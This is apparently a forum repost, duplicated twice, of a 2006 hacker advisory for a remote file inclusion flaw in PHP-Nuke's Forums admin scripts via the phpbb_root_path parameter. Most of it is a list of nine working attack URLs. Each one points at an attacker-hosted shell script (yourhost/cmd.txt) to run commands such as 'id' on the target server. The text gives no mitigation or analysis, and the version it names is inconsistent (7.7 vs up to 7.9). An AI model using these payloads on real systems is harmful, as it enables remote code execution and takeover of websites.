PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions
« : Eylül 07, 2006, 06:45:38 ÖS » Alıntı
--------------------------------------------------------------------------------
# PHP-NUKE Remote File Inclusion[PHP-NUKE]
# Contact : [email protected] http://blogcu.com/KeyCoder
# Risk : High
# Class : Remote
# Version HP-NUKE 7.7
--------------------------------------------
Site:php-nuke.org
--------------------------------------------
Example Vulnerable:
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forums.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_users.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_words.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
------------------------------------------------
By KeyCoder
Greetz:<SecretlyX-BeLa> all Turkish Hackers
# bb-pcsecurity.de - always be up to date
« : Eylül 07, 2006, 06:45:38 ÖS » Alıntı
--------------------------------------------------------------------------------
# PHP-NUKE Remote File Inclusion[PHP-NUKE]
# Contact : [email protected] http://blogcu.com/KeyCoder
# Risk : High
# Class : Remote
# Version HP-NUKE 7.7
--------------------------------------------
Site:php-nuke.org
--------------------------------------------
Example Vulnerable:
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forums.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_users.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_words.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
------------------------------------------------
By KeyCoder
Greetz:<SecretlyX-BeLa> all Turkish Hackers
# bb-pcsecurity.de - always be up to date